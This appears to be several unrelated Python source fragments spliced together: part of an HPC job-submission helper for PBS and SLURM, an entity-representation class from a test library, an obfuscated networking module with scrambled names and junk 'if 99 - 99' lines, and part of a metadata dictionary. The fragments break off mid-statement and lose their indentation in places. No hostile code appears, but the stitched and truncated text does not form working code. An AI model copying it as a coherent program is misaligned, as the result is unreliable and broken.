    ------
    ValueError
        If a string cannot be parsed, or the resulting time is not positive.
    """
    if isinstance(t, str):
        # Anchor the pattern at the end (\Z) so trailing garbage such as
        # "1:00:00x" or "10:00:00.5" is rejected instead of being silently
        # truncated to its leading HH:MM:SS prefix.
        m = re.match(r"([0-9]+):([0-9]{2}):([0-9]{2})\Z", t)
        if not m:
            raise ValueError("unable to parse qsub time string")
        hh, mm, ss = map(int, m.groups())
        t = dt.timedelta(hours=hh, minutes=mm, seconds=ss)
    if not isinstance(t, dt.timedelta):
        # Numeric input: interpret as hours.
        t = dt.timedelta(hours=t)
    if t <= dt.timedelta(0):
        raise ValueError("qsub time must be positive")
    # timedelta normalizes to (days, seconds); fold days back into hours.
    hours, rem = divmod(t.seconds + t.days * 86400, 3600)
    minutes, seconds = divmod(rem, 60)
    return "{:d}:{:02d}:{:02d}".format(hours, minutes, seconds)
def batch_sub(
cmd,
name=None,
mem=None,
nodes=None,
node_list=None,
ppn=None,
cput=None,
wallt=None,
output=None,
error=None,
queue=None,
dep_afterok=None,
workdir=None,
batch_args=[],
omp_threads=None,
mpi_procs=None,
mpi_args="",
env_script=None,
env=None,
nice=0,
echo=True,
delete=True,
submit=True,
scheduler="pbs",
debug=False,
exclude=None,
verbose=False,
):
"""
Create and submit a SLURM or PBS job.
Arguments
---------
cmd : string or list of strings
A command sequence to run via SLURM or PBS.
The command will be inserted into a qsub submission script
with all of the options specified in the remaining arguments.
name : string, optional
Name of the job.
mem : float or string, optional
Amount of memory to request for the job. float values in GB.
Or pass a string (eg '4gb') to use directly.
nodes : int or string, optional
Number of nodes to use in job
If a string, will be passed as-is to PBS -l node= resource
If using SLURM and a string, will overwrite node_list if None
node_list : string or list of strings
List of nodes that can be used for job. SLURM-only.
ppn : int, optional
Numper of processes per node
cput : string or float or datetime.timedelta, optional
Amount of CPU time requested.
String values should be in the format HH:MM:SS, e.g. '10:00:00'.
Numerical values are interpreted as a number of hours.
wallt : string or float or datetime.timedelta, optional
Amount of wall clock time requested.
String values should be in the format HH:MM:SS, e.g. '10:00:00'.
Numerical values are interpreted as a number of hours.
output : string, optional
PBS standard output filename.
error : string, optional
PBS error output filename.
queue : string, optional
The name of the queue to which to submit jobs
dep_afterok : string or list of strings
Dependency. Job ID (or IDs) on which to wait for successful completion,
before starting this job
workdir : string, optional
Directory from where the script will be submitted.
This is where the output and error files will be created
by default. Default: current directory.
batch_args : string or list of strings, optional
Any additional arguments to pass to slurm/pbs.
omp_threads : int, optional
Number of OpenMP threads to use per process
mpi_procs : int
Number of MPI processes to use.
``mpirun`` calls will be added to all lines of cmd as needed.
If cmd contains ``mpirun`` or ``mpiexec``, this does nothing.
mpi_args : string
Additional command line arguments for inserted ``mpirun`` commands.
If cmd contains ``mpirun`` or ``mpiexec``, this does nothing.
env_script : string, optional
Path to script to source during job script preamble
For loading modules, setting environment variables, etc
env : dict, optional
Dictionary of environment variables to set in job script
nice : int, optional
Adjust scheduling priority (SLURM only). Range from -5000 (highest
priority) to 5000 (lowest priority).
Note: actual submitted --nice value is 5000 higher, since negative
values require special privilege.
echo : bool, optional
Whether to use bash "set -x" in job script to echo commands to stdout.
delete : bool, optional
If True, delete the submit script upon job submission.
submit : bool, optional
If True (default) submit the job script once create. Will override the
default option when False, to keep the script
scheduler : string, optional
Which scheduler system to write a script for. One of "pbs" or "slurm"
debug : bool, optional
If True, print the contents of the job script to stdout for debugging.
exclude : string or list of strings
List of nodes that will be excluded for job. SLURM-only.
verbose : bool, optional
Print the working directory, and the job ID if submitted successfully.
Returns
-------
jobid : string
The ID of the submitted job.
Example
-------
>>> jobid = batch_sub("echo Hello", name="testing", nodes="1:ppn=1",
... cput='1:00:00', mem='1gb')
>>> print(jobid)
221114.feynman.princeton.edu
>>> print(open('testing.o221114','r').read())
Hello
"""
if isinstance(cmd, list):
cmd = " ".join(cmd)
scheduler = scheduler.lower()
if mem is not None and not isinstance(mem, str):
if mem < 0:
mem = None
elif scheduler == "pbs":
mem = "{:d}mb".format(int(np.ceil(mem * 1024.0)))
elif scheduler == "slurm":
mem = "{:d}".format(int(np.ceil(mem * 1024.0)))
if isinstance(dep_afterok, str):
dep_afterok = [dep_afterok]
if isinstance(batch_args, str):
batch_args = batch_args.split()
if not debug and not submit:
delete = False
try:
nodes = int(nodes)
except ValueError:
# nodes is a string that's not convertible to int
if scheduler == "slurm" and node_list is None:
node_list = nodes
nodes = 1
job_script = ["#!/usr/bin/env bash"]
# TODO can maybe replace manual option with some automatic detection
if scheduler == "pbs":
# create PBS header
if name:
job_script += ["#PBS -N {:s}".format(name)]
if mem:
job_script += ["#PBS -l mem={:s}".format(mem)]
if nodes and ppn:
job_script += ["#PBS -l nodes={}:ppn={}".format(nodes, ppn)]
if cput:
job_script += ["#PBS -l cput={:s}".format(format_time(cput))]
if wallt:
job_script += ["#PBS -l walltime={:s}".format(format_time(wallt))]
if output:
job_script += ["#PBS -o {:s}".format(output)]
if error:
job_script += ["#PBS -e {:s}".format(error)]
if queue:
job_script += ["#PBS -q {:s}".format(queue)]
if dep_afterok:
job_script += ["#PBS -W depend=afterok:{}".format(":".join(dep_afterok))]
elif scheduler == "slurm":
# create slurm header
if name:
job_script += ["#SBATCH --job-name={:s}".format(name)]
if mem:
job_script += ["#SBATCH --mem={:s}".format(mem)]
if nodes:
job_script += ["#SBATCH --nodes={}".format(nodes)]
if node_list is not None:
if len(node_list) > 1 and not isinstance(node_list, str):
node_list = ",".join(node_list)
job_script += ["#SBATCH --nodelist={}".format(node_list)]
if exclude is not None:
if len(exclude) > 1 and not isinstance(exclude, str):
exclude = ",".join(exclude)
elif len(exclude) == 1 and not isinstance(exclude, str):
exclude = exclude[0]
job_script += ["#SBATCH --exclude={}".format(exclude)]
if ppn:
job_script += ["#SBATCH --ntasks-per-node={}".format(ppn)]
if omp_threads:
job_script += ["#SBATCH --cpus-per-task={}".format(omp_threads)]
if cput:
if wallt is None:
warn("Using CPU time as wall time for slurm")
job_script += ["#SBATCH --time={:s}".format(format_time(cput))]
else:
warn("Ignoring CPU time for slurm, using wall time only")
if wallt:
job_script += ["#SBATCH --time={:s}".format(format_time(wallt))]
if nice is not None:
nice += 5000
job_script += ["#SBATCH --nice={}".format(nice)]
if output:
job_script += ["#SBATCH --output={:s}".format(output)]
if error:
job_script += ["#SBATCH --error={:s}".format(error)]
if queue:
job_script += ["#SBATCH --partition={:s}".format(queue)]
if dep_afterok:
job_script += [
"#SBATCH --dependency=afterok:{}".format(":".join(dep_afterok))
]
# create job script preamble
if echo:
job_script += ["set -x"]
if env_script:
if not os.path.exists(env_script):
raise ValueError("Could not find environment script: {}".format(env_script))
job_script += ["source {}".format(env_script)]
if env:
for k, v in env.items():
job_script += ["export {}={}".format(k, v)]
if scheduler == "pbs":
job_script += ["cd $PBS_O_WORKDIR"]
elif scheduler == "slurm":
job_script += ["cd $SLURM_SUBMIT_DIR"]
if omp_threads:
job_script += ["export OMP_NUM_THREADS={}".format(omp_threads)]
# finally, add the command string to script
if mpi_procs is not None:
if "mpirun" not in cmd and "mpiexec" not in cmd:
mpi = "mpiexec -n {:d} {:s} ".format(mpi_procs, mpi_args)
cmd = "\n".join(
[(mpi + line) | |
<gh_stars>1-10
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Create, description, representation and equal of entities."""
# pylint: disable=too-many-arguments
# pylint: disable=too-few-public-methods
# pylint: disable=inconsistent-return-statements
import copy
from datetime import date, datetime
from dateutil import parser, tz
from lib.entities import mixin
from lib.utils import help_utils
from lib.utils.string_utils import StringMethods
class Representation(object):
  """Class to operate with entities' representation."""
  # pylint: disable=too-many-public-methods
  # Result of the last diff between two entities:
  # {"equal": {"atr7": val7, ...}, "diff": {"atr3": val3}}
  diff_info = None
  # Attributes blanked out when building a tree-view item representation
  # (see 'tree_item_representation').
  tree_view_attrs_to_exclude = (
      "created_at", "updated_at", "custom_attributes", "assertions",
      "external_slug", "external_id", "review")
  # Names of attributes that hold one or more people; their dict values are
  # collapsed to the person's email during REST-to-UI conversion.
  people_attrs_names = [
      "creators", "assignees", "verifiers", "admins", "primary_contacts",
      "secondary_contacts", "audit_captains", "auditors",
      "control_operators", "control_owners",
      "principal_assignees", "secondary_assignees", "managers", "editors",
      "readers"]  # multiply
@property
def attrs_names(self):
"""Entity instance's attributes names according to class model."""
return self.get_attrs_names(self.__class__)
@property
def attrs_names_to_repr(self):
"""Entity instance's attributes names w/o REST and exclude
'custom_attribute_definitions', 'custom_attribute_values'.
"""
# todo: add logic to getting 'url', 'id' via UI services
return [attr_name for attr_name in self.attrs_names if attr_name not in [
"custom_attribute_definitions", "custom_attribute_values", "href",
"url", "id"]]
@classmethod
def all_attrs_names(cls):
"""All possible entities' attributes names include REST."""
return list(set(cls.get_attrs_names() + [
"access_control_list", "recipients", "default_people",
"modal_title", "assignee_type", "user_roles", "link", "kind"]))
@classmethod
def get_attrs_names(cls, entity=None):
"""Get list unique entities attributes' names. If 'entity' then get
attributes of one entered entity, else get attributes of all entities.
"""
all_entities_cls = (help_utils.convert_to_list(entity) if entity
else list(Entity.all_entities_classes()))
all_entities_attrs_names = StringMethods.convert_list_elements_to_list(
[entity_cls().__dict__.keys() for entity_cls in all_entities_cls])
return list(set(all_entities_attrs_names))
def __repr__(self):
"""Dictionary representation for entity."""
return str(dict(
zip(self.attrs_names_to_repr,
[getattr(self, attr_name_to_repr) for
attr_name_to_repr in self.attrs_names_to_repr])))
  @staticmethod
  def remap_collection():
    """Get transformation dictionary {'OLD KEY': 'NEW KEY'}, where
    'OLD KEY' - UI elements and CSV fields correspond to
    'NEW KEY' - objects attributes.

    Keys are upper-cased before being returned, so lookups against UI/CSV
    labels are case-insensitive.
    """
    from lib.constants import element, files
    els = element.TransformationElements
    csv = files.TransformationCSVFields
    # common for UI and CSV
    result_remap_items = {
        els.TITLE: "title", els.ADMIN: "admins",
        els.CODE: "slug", els.REVIEW_STATE: "review_status",
        els.OBJECT_REVIEW: "os_state",
        els.STATE: "status"
    }
    # UI-only labels
    ui_remap_items = {
        els.PROGRAM_MANAGERS: "managers", els.VERIFIED: "verified",
        els.STATUS: "status", els.LAUNCH_STATUS: "status",
        els.LAST_UPDATED: "updated_at",
        els.AUDIT_CAPTAINS: "audit_captains",
        els.AUDITORS: "auditors",
        els.CREATED_AT: "created_at",
        "MAPPED_OBJECTS": "mapped_objects", els.ASSIGNEES: "assignees",
        els.CREATORS: "creators", "VERIFIERS": "verifiers",
        "COMMENTS": "comments", "CREATED_AT": "created_at",
        els.MODIFIED_BY: "modified_by", "LAST_UPDATED_BY": "modified_by",
        "UPDATED_AT": "updated_at", "ASSESSMENT_TYPE": "assessment_type",
        els.ASMT_TYPE: "assessment_type",
        els.RECIPIENTS: "recipients",
        "IS_VERIFIED": "verified",
        "CUSTOM_ATTRIBUTES": "custom_attributes",
        "DESCRIPTION": "description",
        "EVIDENCE_URLS": "evidence_urls",
        "ASSERTIONS": "assertions",
        "EXTERNAL_SLUG": "external_slug",
        "EXTERNAL_ID": "external_id",
        "REVIEW_STATUS": "review_status",
        "REVIEW_STATUS_DISPLAY_NAME": "review_status_display_name",
        "PRIMARY_CONTACTS": "primary_contacts",
        "CONTROL_OPERATORS": "control_operators",
        "CONTROL_OWNERS": "control_owners",
        "URL": "url",
        "ID": "id", "Risk Type": "risk_type",
        "REVIEW": "review"
    }
    # CSV-only labels
    csv_remap_items = {
        csv.REVISION_DATE: "updated_at", "REVIEW STATUS": "review_status",
        "REVIEW_STATUS_DISPLAY_NAME": "review_status_display_name"
    }
    # UI/CSV specific mappings extend (and may override) the common ones.
    result_remap_items.update(ui_remap_items)
    result_remap_items.update(csv_remap_items)
    return StringMethods.dict_keys_to_upper_case(result_remap_items)
  @staticmethod
  def repr_obj_to_dict(objs):
    """Convert objects' representation to dictionary 'obj.attr_name' =
    'attr_value' to dictionary or list of dictionaries with items
    {'attr_name': 'attr_value'}.

    Scalars (str/unicode/int), dicts and booleans pass through unchanged;
    dates are converted to their ISO string form.
    """
    if objs or isinstance(objs, bool):
      if isinstance(objs, list):
        # only lists of entity objects (not scalars/dicts/falsy items)
        # are converted element-wise
        if (all(not isinstance(_, dict) and
                not isinstance(_, (str, unicode, int)) and
                _ for _ in objs)):
          objs = [_.__dict__ for _ in objs]
      else:
        if isinstance(objs, date):
          objs = objs.__str__()
        elif (not isinstance(objs, dict) and
              not isinstance(objs, (str, unicode, int))):
          objs = objs.__dict__
    return objs
@staticmethod
def repr_dict_to_obj(dic):
"""Convert dictionary to Entity representation (dictionary's keys and
values to attributes names and attributes values).
"""
# pylint: disable=expression-not-assigned
# pylint: disable=consider-iterating-dictionary
entity = Entity()
[setattr(entity, k, v) for k, v in dic.iteritems()]
return entity
  def repr_ui(self):
    """Convert entity's attributes values from REST like to UI like
    representation.

    Delegates to 'convert_repr_rest_to_ui' for this single entity.
    """
    return self.convert_repr_rest_to_ui(objs=self)
  def tree_item_representation(self):
    """Make object's copy and convert it to the view of tree item.

    Attributes listed in 'tree_view_attrs_to_exclude' are blanked out, and
    'modified_by' is resolved to the person's email via the REST service.
    """
    obj = copy.deepcopy(self)
    for attr in obj.tree_view_attrs_to_exclude:
      setattr(obj, attr, None)
    from lib.service import rest_service
    # 'modified_by' arrives as a {"type": "Person", "id": x} dict;
    # look the person up and keep only the email
    new_modified_by_value = getattr(rest_service.ObjectsInfoService().get_obj(
        obj=obj.repr_dict_to_obj(obj.modified_by)), "email")
    obj.modified_by = new_modified_by_value
    return obj
  @classmethod  # noqa: ignore=C901
  def convert_repr_rest_to_ui(cls, objs):
    """Convert object's or objects' attributes values from REST like
    (dict or list of dict) representation to UI like with unicode.
    Examples:
    None to None, u'Ex' to u'Ex', [u'Ex1', u'Ex2', ...] to u'Ex1, Ex2',
    {'name': u'Ex', ...} to u'Ex',
    [{'name': u'Ex1', ...}, {'name': u'Ex2', ...}] to u'Ex1, Ex2'
    """
    # pylint: disable=too-many-locals
    # pylint: disable=undefined-loop-variable
    # pylint: disable=invalid-name
    def convert_repr_rest_to_ui(obj):
      """Convert object's attributes from REST to UI like representation."""
      def convert_attr_val_repr_dict_to_unicode(attr_name, attr_value):
        """Convert attribute value from dictionary to unicode representation
        (get value by key from dictionary 'attr_value' where key determine
        according to 'attr_name').
        """
        if isinstance(attr_value, dict):
          converted_attr_value = attr_value
          # people-like attributes collapse to the person's email
          if attr_name in Representation.people_attrs_names + [
              "created_by", "modified_by"
          ]:
            converted_attr_value = unicode(attr_value.get("email"))
          # related objects collapse to their title; CA definitions instead
          # become an {id: TITLE} mapping
          if attr_name in ["custom_attribute_definitions", "program", "audit",
                           "mapped_objects"]:
            converted_attr_value = (
                unicode(attr_value.get("title")) if
                attr_name != "custom_attribute_definitions" else
                {attr_value.get("id"): attr_value.get("title").upper()}
            )
          if attr_name in ["custom_attribute_values"]:
            converted_attr_value = {attr_value.get("custom_attribute_id"):
                                    attr_value.get("attribute_value")}
          if obj_attr_name == "comments":
            converted_attr_value = {
                k: (parser.parse(v).replace(tzinfo=tz.tzutc()) if
                    k == "created_at" and isinstance(v, unicode) else v)
                for k, v in attr_value.iteritems()
                if k in ["modified_by", "created_at", "description"]}
          if attr_name == "assertions":
            # map an assertion id back to its symbolic name
            for name, assertion_id in ControlEntity.ASSERTIONS.iteritems():
              if assertion_id == attr_value["id"]:
                converted_attr_value = name
        return converted_attr_value
      origin_obj = copy.deepcopy(obj)
      for obj_attr_name in obj.__dict__.keys():
        # 'Ex', u'Ex', 1, None to 'Ex', u'Ex', 1, None
        obj_attr_value = getattr(obj, obj_attr_name)
        # REST like u'08-20-2017T04:30:45' to date=2017-08-20,
        # timetz=04:30:45+00:00
        if (obj_attr_name in ["updated_at", "created_at"] and
                isinstance(obj_attr_value, unicode)):
          obj_attr_value = (parser.parse(obj_attr_value).
                            replace(tzinfo=tz.tzutc()))
        if isinstance(obj_attr_value, dict) and obj_attr_value:
          # "modified_by" {"type": "Person", "id": x} to u'<EMAIL>'
          # todo: deprecated?
          if obj_attr_name == "modified_by":
            from lib.service import rest_service
            obj_attr_value = getattr(rest_service.ObjectsInfoService().get_obj(
                obj=Representation.repr_dict_to_obj(obj_attr_value)), "email")
          # {'name': u'Ex1', 'type': u'Ex2', ...} to u'Ex1'
          else:
            obj_attr_value = convert_attr_val_repr_dict_to_unicode(
                obj_attr_name, obj_attr_value)
        # [el1, el2, ...] or [{item1}, {item2}, ...] to [u'Ex1, u'Ex2', ...]
        if (isinstance(obj_attr_value, list) and
                all(isinstance(item, dict) for item in obj_attr_value)):
          obj_attr_value = [
              convert_attr_val_repr_dict_to_unicode(obj_attr_name, item) for
              item in obj_attr_value]
        setattr(obj, obj_attr_name, obj_attr_value)
      # merge "custom_attribute_definitions" and "custom_attribute_values"
      obj_cas_attrs_names = [
          "custom_attributes", "custom_attribute_definitions",
          "custom_attribute_values"]
      if set(obj_cas_attrs_names).issubset(obj.__dict__.keys()):
        cas_def = obj.custom_attribute_definitions
        cas_val = obj.custom_attribute_values
        # form CAs values of CAs definitions exist but CAs values not, or CAs
        # definitions have different then CAs values lengths
        if (cas_def and
            (not cas_val or (isinstance(cas_def and cas_val, list)) and
             len(cas_def) != len(cas_val))):
          from lib.entities.entities_factory import (
              CustomAttributeDefinitionsFactory)
          # keys already present in 'cas_val' keep their existing values;
          # missing ones are generated from the original (pre-conversion)
          # CA definitions
          cas_val_dicts_keys = ([_.keys()[0] for _ in cas_val] if
                                isinstance(cas_val, list) else [None])
          _cas_val = [
              {k: v} for k, v in
              CustomAttributeDefinitionsFactory.generate_ca_title_id(
                  [Representation.repr_dict_to_obj(cad)
                   for cad in origin_obj.custom_attribute_definitions]
              ).iteritems() if k not in cas_val_dicts_keys]
          cas_val = _cas_val if not cas_val else cas_val + _cas_val
        cas_def_dict = (
            dict([_def.iteritems().next() for _def in cas_def]) if
            (isinstance(cas_def, list) and
             all(isinstance(_def, dict)
                 for _def in cas_def)) else None)
        cas_val_dict = (
            dict([_val.iteritems().next() for _val in cas_val]) if
            (isinstance(cas_def, list) and
             all(isinstance(_def, dict)
                 for _def in cas_def)) else None)
        cas = StringMethods.merge_dicts_by_same_key(cas_def_dict, cas_val_dict)
        if obj.custom_attributes:
          cas.update(obj.custom_attributes)
        if cas in [{None: None}, {}]:
          cas = None
        setattr(obj, "custom_attributes", cas)
      return obj
    return help_utils.execute_method_according_to_plurality(
        objs=objs, types=Entity.all_entities_classes(),
        method_name=convert_repr_rest_to_ui)
  def repr_snapshot(self, parent_obj):
    """Convert entity's attributes values to Snapshot representation
    scoped to 'parent_obj'.
    """
    return (self.convert_repr_to_snapshot(
        obj=self, parent_obj=parent_obj))
def repr_min_dict(self):
"""Get and return entity's minimal dictionary representation w/
'type', 'id' keys, e.g. {'type': 'Control', 'id': 1}
"""
return {"type": getattr(self, "type"),
"id": getattr(self, "id")}
  @classmethod  # noqa: ignore=C901
  def convert_repr_to_snapshot(cls, obj, parent_obj):
    """Convert object's or objects' attributes values to Snapshot
    representation.
    Retrieved values will be used for: 'id'.
    Set values will be used for: 'title, 'type', 'slug', 'href'.
    """
    def convert_repr_to_snapshot(origin_obj, parent_obj):
      """Convert object's attributes to Snapshot representation."""
      from lib.service import rest_service
      origin_obj = copy.deepcopy(origin_obj)
      # fetch the snapshot of 'origin_obj' that is scoped to 'parent_obj'
      snapshoted_obj = (
          rest_service.ObjectsInfoService().get_snapshoted_obj(
              origin_obj=origin_obj, paren_obj=parent_obj))
      # overwrite the copy's attributes with the snapshot's attributes
      origin_obj.__dict__.update(
          {k: v for k, v in snapshoted_obj.__dict__.iteritems()})
      return origin_obj
    return help_utils.execute_method_according_to_plurality(
        objs=obj, types=Entity.all_entities_classes(),
        method_name=convert_repr_to_snapshot, parent_obj=parent_obj)
def update_attrs(self, is_replace_attrs=True, is_allow_none=True,
is_replace_dicts_values=False, **attrs):
"""Update entity's attributes values according to entered data
(dictionaries of attributes and values).
If 'is_replace_values_of_dicts' then update values of dicts in list which
is value of particular object's attribute name.
"""
return (self.update_objs_attrs_values(
objs=self, is_replace_attrs_values=is_replace_attrs,
is_allow_none_values=is_allow_none,
is_replace_values_of_dicts=is_replace_dicts_values, **attrs))
def delete_attrs(self, *attrs_names):
"""Delete entity's attributes according to '*attrs_names'."""
# pylint: disable=expression-not-assigned
[delattr(self, attr_name)
for attr_name in attrs_names if hasattr(self, attr_name)]
def set_attrs(self, *attrs_names, **attrs):
"""Set entity's attributes according to '**attrs' items if key and value
are corresponding, otherwise set values to None where '*attrs_names'
is keys.
"""
# pylint: disable=expression-not-assigned
[setattr(self, attr_name, attrs.get(attr_name))
for attr_name in attrs_names]
@classmethod
def update_objs_attrs_values(
cls, objs, is_replace_attrs_values=True,
is_allow_none_values=True, is_replace_values_of_dicts=False, **attrs
):
"""Update object or list of objects ('objs') attributes values by
manually entered data if attribute name exist in 'attrs_names' witch equal
to 'all_objs_attrs_names' according to dictionary of attributes and values
| |
/ 1000000
OOoOO0 = round ( OOoOO0 , 2 )
if 99 - 99: IiII / OoO0O00 % Oo0Ooo * iIii1I11I1II1
if 89 - 89: I1Ii111 + Oo0Ooo - ooOoO0o
if 63 - 63: oO0o + OoOoOO00 - oO0o - Ii1I % ooOoO0o * I1Ii111
if 92 - 92: IiII % IiII / o0oOOo0O0Ooo * OoO0O00 % OoOoOO00
if 12 - 12: I1IiiI
iI1IiIiIIII11 = self . normalize ( self . packet_count )
oOooO0O0 = self . normalize ( self . byte_count )
if 83 - 83: o0oOOo0O0Ooo * Oo0Ooo - oO0o + O0 / i11iIiiIii
if 64 - 64: OoO0O00 % OoOoOO00 % I1IiiI - Ii1I / IiII * Ii1I
if 74 - 74: IiII - O0 % OOooOOo % OoooooooOO - I11i
if 4 - 4: i1IIi + OoOoOO00 + iIii1I11I1II1 - i1IIi * i11iIiiIii
if 99 - 99: I1ii11iIi11i - O0 % II111iiii + ooOoO0o % OoO0O00 * Ii1I
if ( summary ) :
i1I1ii111 = "<br>" if html else ""
iI1IiIiIIII11 , oOooO0O0 = self . stat_colors ( iI1IiIiIIII11 , oOooO0O0 , html )
OO0ooo0O = "packet-count: {}{}byte-count: {}" . format ( iI1IiIiIIII11 , i1I1ii111 , oOooO0O0 )
OooOooo = "packet-rate: {} pps\nbit-rate: {} Mbps" . format ( iiiiiI1I1 , OOoOO0 )
if 19 - 19: O0 / I1Ii111 + I1Ii111 . I1ii11iIi11i
if ( html != "" ) : OooOooo = lisp_span ( OO0ooo0O , OooOooo )
else :
II11 = str ( iiiiiI1I1 )
iI1II1IiIiIi = str ( OOoOO0 )
if ( html ) :
iI1IiIiIIII11 = lisp_print_cour ( iI1IiIiIIII11 )
II11 = lisp_print_cour ( II11 )
oOooO0O0 = lisp_print_cour ( oOooO0O0 )
iI1II1IiIiIi = lisp_print_cour ( iI1II1IiIiIi )
if 9 - 9: I1Ii111 * II111iiii % Ii1I - Ii1I % OoO0O00 % o0oOOo0O0Ooo
i1I1ii111 = "<br>" if html else ", "
if 26 - 26: o0oOOo0O0Ooo - I1IiiI / OoooooooOO / ooOoO0o % iIii1I11I1II1 % I1ii11iIi11i
OooOooo = ( "packet-count: {}{}packet-rate: {} pps{}byte-count: " + "{}{}bit-rate: {} mbps" ) . format ( iI1IiIiIIII11 , i1I1ii111 , II11 , i1I1ii111 , oOooO0O0 , i1I1ii111 ,
# Ii1I
iI1II1IiIiIi )
if 88 - 88: OoooooooOO
return ( OooOooo )
if 60 - 60: II111iiii % Oo0Ooo * I11i * OoO0O00 - OoOoOO00
if 65 - 65: iII111i
if 86 - 86: OoO0O00 / II111iiii % OoOoOO00 * OOooOOo . I1IiiI / IiII
if 100 - 100: i1IIi / I1IiiI * I1ii11iIi11i % ooOoO0o + OoO0O00 * oO0o
if 51 - 51: I1Ii111 - OoooooooOO / iII111i / I1IiiI % ooOoO0o / OoO0O00
if 45 - 45: i11iIiiIii - II111iiii / i1IIi * OoOoOO00
if 1 - 1: OOooOOo + I1IiiI + Ii1I . iII111i
if 89 - 89: I1Ii111 * I1IiiI . i1IIi - iIii1I11I1II1 * I1Ii111
#
# Decapsulation statistics: one lisp_stats counter per accept/drop reason.
#
lisp_decap_stats = {
 "good-packets" : lisp_stats ( ) , "ICV-error" : lisp_stats ( ) ,
 "checksum-error" : lisp_stats ( ) , "lisp-header-error" : lisp_stats ( ) ,
 "no-decrypt-key" : lisp_stats ( ) , "bad-inner-version" : lisp_stats ( ) ,
 "outer-header-error" : lisp_stats ( )
}
if 5 - 5: OoOoOO00 % i1IIi
if 31 - 31: Oo0Ooo * O0 . OOooOOo . o0oOOo0O0Ooo + OoO0O00 + II111iiii
if 76 - 76: Oo0Ooo + I1IiiI - O0
if 58 - 58: IiII * i1IIi . I1IiiI - iII111i
class lisp_rloc ( ) :
def __init__ ( self , recurse = True ) :
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_name = None
self . interface = None
self . translated_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . translated_port = 0
self . priority = 255
self . weight = 0
self . mpriority = 255
self . mweight = 0
self . uptime = 0
self . state = LISP_RLOC_UP_STATE
self . last_state_change = None
self . rle_name = None
self . elp_name = None
self . geo_name = None
self . json_name = None
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . stats = lisp_stats ( )
self . last_rloc_probe = None
self . last_rloc_probe_reply = None
self . rloc_probe_rtt = - 1
self . recent_rloc_probe_rtts = [ - 1 , - 1 , - 1 ]
self . rloc_probe_hops = "?/?"
self . recent_rloc_probe_hops = [ "?/?" , "?/?" , "?/?" ]
self . last_rloc_probe_nonce = 0
self . echo_nonce_capable = False
self . map_notify_requested = False
self . rloc_next_hop = None
self . next_rloc = None
if 73 - 73: Oo0Ooo . OoOoOO00
if ( recurse == False ) : return
if 50 - 50: IiII / o0oOOo0O0Ooo
if 9 - 9: Oo0Ooo - OoO0O00 + iII111i / OoooooooOO
if 52 - 52: O0
if 34 - 34: OoooooooOO + OoOoOO00 - Oo0Ooo . OOooOOo * iIii1I11I1II1
if 93 - 93: i11iIiiIii / Oo0Ooo * OoOoOO00 / ooOoO0o + OoO0O00 * OOooOOo
if 81 - 81: IiII * iII111i + i1IIi + I1Ii111 / OoO0O00
oOOoO = lisp_get_default_route_next_hops ( )
if ( oOOoO == [ ] or len ( oOOoO ) == 1 ) : return
if 54 - 54: ooOoO0o
self . rloc_next_hop = oOOoO [ 0 ]
I1IIII = self
for iiIIII1I1ii in oOOoO [ 1 : : ] :
O0oo = lisp_rloc ( False )
O0oo = copy . deepcopy ( self )
O0oo . rloc_next_hop = iiIIII1I1ii
I1IIII . next_rloc = O0oo
I1IIII = O0oo
if 49 - 49: I11i + o0oOOo0O0Ooo % OOooOOo . iII111i
if 11 - 11: I1Ii111 - ooOoO0o
if 76 - 76: oO0o - i1IIi - O0 % Oo0Ooo
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 66 - 66: IiII % iII111i / o0oOOo0O0Ooo
if 44 - 44: iIii1I11I1II1 + o0oOOo0O0Ooo + OoO0O00 * II111iiii
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 84 - 84: Oo0Ooo * I1Ii111 - o0oOOo0O0Ooo % Ii1I
if 69 - 69: I11i + OoOoOO00 - i11iIiiIii * O0 % O0
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 81 - 81: I11i - o0oOOo0O0Ooo % Ii1I / I1Ii111 * II111iiii
if 40 - 40: OoO0O00 . i11iIiiIii
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 36 - 36: o0oOOo0O0Ooo * iII111i / I1ii11iIi11i % i1IIi % I1ii11iIi11i + i11iIiiIii
if 24 - 24: I1Ii111 / ooOoO0o - i11iIiiIii
if 32 - 32: II111iiii * Ii1I . ooOoO0o * Oo0Ooo - I1ii11iIi11i % I11i
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 96 - 96: Ii1I / OOooOOo / O0
if 8 - 8: iII111i + OOooOOo / I1ii11iIi11i . iII111i
def print_rloc ( self , indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , Oo0OO0000oooo , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 45 - 45: i1IIi
if 28 - 28: iII111i
def print_rloc_name ( self , | |
"1905:19"): "metadataonly",
("prop", "1905:2"): "metadataonly",
("prop", "1905:20"): "metadataonly",
("prop", "1905:21"): "metadataonly",
("prop", "1905:22"): "metadataonly",
("prop", "1905:24"): "metadataonly",
("prop", "1905:25"): "metadataonly",
("prop", "1905:27"): "metadataonly",
("prop", "1905:28"): "metadataonly",
("prop", "1905:29"): "metadataonly",
("prop", "1905:3"): "metadataonly",
("prop", "1905:30"): "metadataonly",
("prop", "1905:31"): "metadataonly",
("prop", "1905:32"): "metadataonly",
("prop", "1905:33"): "metadataonly",
("prop", "1905:34"): "metadataonly",
